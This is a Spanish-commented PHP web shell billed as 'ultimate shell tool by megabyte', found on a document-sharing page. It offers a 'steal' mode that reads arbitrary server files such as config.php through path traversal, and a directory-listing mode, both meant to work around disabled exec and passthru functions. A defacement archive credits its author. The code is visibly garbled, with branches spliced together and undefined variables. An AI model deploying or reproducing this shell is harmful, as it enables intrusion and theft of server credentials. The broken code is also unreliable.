Professional Documents
Culture Documents
/*
esta disenada usando funciones diferentes a las que siempre vemos en todas las
shells
para poder navegar por mas sistemas sin limitaciones(no mas problemas con
passtru,exec,cmd)
se usan funciones como show source,en vez del tipico cat,declarando variables
externas para una mejor
compatibilidad etc.
pandora te amo
greetx:
nobody,i hate everyone xdd
www.mbytesecurity.org
*/
$mode = $_get['mode'];
$cat = $_get['cat'];
$dir = $_get['dir'];
if($mode=="")
{
echo"<title>ultimate shell tool by megabyte 1.0</title>";
echo"<body bgcolor=#000000><center>";
echo"<p><font face=fixedsys size=5><font color=#ff0000>u</font><font
color=#ffffff>ltimate ";
echo"</font><font color=#ff0000>s</font><font color=#ffffff>hell </font>";
echo"<font color=#ff0000>t</font><font color=#ffffff>ool<br>by </font>";
echo"<font color=#ff0000>m</font><font color=#ffffff>egabyte<br>";
echo"</font></font><font color=#ffffff><br>";
echo" </font></p>";
echo"</center>";
echo"<p align=justify><font face=fixedsys color=#ff0000>1.-</font><font
color=#ffffff face=fixedsys><a href=?mode=steal><font color=#3366ff>roba ";
echo"source</font></a>:<br>";
echo" con esto podemos leer en texto plano el c�digo de
cualquier ";
echo"archivo en el servidor (ya sea php, htaccess, logs, etc..). es un
<u>reemplazo</u> ";
echo"del comando "cat archivo.x" de linux. nos sirve cuando queremos
usar una shell y ";
echo"claro... el servidor <u>no nos permite</u> (passtrhu desactivado, etc...) o
debido a que corre bajo windows.<br>";
echo"<br>";
echo"</font><font size=2 face=arial color=#c0c0c0>ejemplo de uso:<br>";
echo"www.sitio.com/utool.php?mode=steal&cat=../../../home/user/public_html/con
fig.php</font></p>";
echo"<p align=left> </p>";
echo"<p align=justify><font face=fixedsys color=#ff0000>2.-</font><font
color=#ffffff face=fixedsys><a href=?mode=list><font color=#3366ff>directory ";
echo"listing</font></a>:<br>";
echo" podemos ver todos los archivos y directorios en una
carpeta. ";
echo"reemplaza el comando "ls", al igual que antes, cuando no podemos
utilizar shell o cuando corre bajo windows.";
echo"<br>muestra todos los archivos y directorios como enlaces, si presionas uno
de ";
echo"estos enlaces podr�s ver el contenido (c�digo) de dicho archivo. si se trata
de ";
echo"un directorio, te dar� un error.<br>";
echo"nos va a ser muy �til para explorar los directorios y saber donde estan las
";
echo"configuraciones.<br>";
echo"<br>";
echo"</font><font face=fixedsys color=#c0c0c0><u>nota:</u> nos va a indicar en ";
echo"donde se ejecuto el script, a modo de saber cual es la direcci�n de los ";
echo"directorios (en este caso: home/user/public_html/).</font><font color=#ffffff
face=fixedsys><br>";
echo"<br>";
echo"</font><font size=2 face=arial color=#c0c0c0>ejemplo de uso:<br>";
echo"www.sitio.com/utool.php?mode=list&dir=home/user/public_html/</font></p>";
echo"<center>";
echo"<p> </p>";
echo"<p><br><b><font face=courier new size=1 color=#c0c0c0>creado por
megabyte<br><br><br>www.mbytesecurity.org<br>pandora te amo<br>
http://www.zone-
h.org/en/defacements/filter/filter_defacer=megabyte+www.mbyte.tk</font></b></p>";
echo"</center>";
}
elseif($mode=="steal")
{
echo "<html>";
echo "<head>";
echo "<title>robar codigo</title>";
echo "</head>";
echo "<body>";
if($cat=="")
{
$cat="utool.php";
}
$size=filesize($cat);
$file_size = round($size / 1024 * 100) / 100 . "kb"; //operaciones matematicas
muy complejas
// para tipos como slasher
o hackzatan....
//si no estudiaste no
intententes comprenderlo :)
echo"<title>directory listing</title>";
$base =
substr($_server['path_translated'],0,strrpos($_server['path_translated'],'/'));
if($dir=="")
{
$dir="./";
}
$path = $dir;
if($formato==".") {
$link = "<i><a href=utool.php?mode=list&dir=$dir/$file>retroceder..</a><br></i>";
}
// muy simple: sin formato, debe ser directorio (aqu� error en directorios con
puntos)
if($formato=="") {
$link = "<a href=utool.php?mode=list&dir=$dir/$file><font
color=#800000>$file</font></a><br>";
}
echo "$link";
}
closedir($dir_handle);
echo "</td></tr></table><br><b><font face=courier new size=1 color=#c0c0c0>creado
por megabyte<br><br><br>www.mbytesecurity.org<br>pandora te amo<br>
http://www.zone-
h.org/en/defacements/filter/filter_defacer=megabyte+www.mbyte.tk</font></b></cente
r>";
}
?>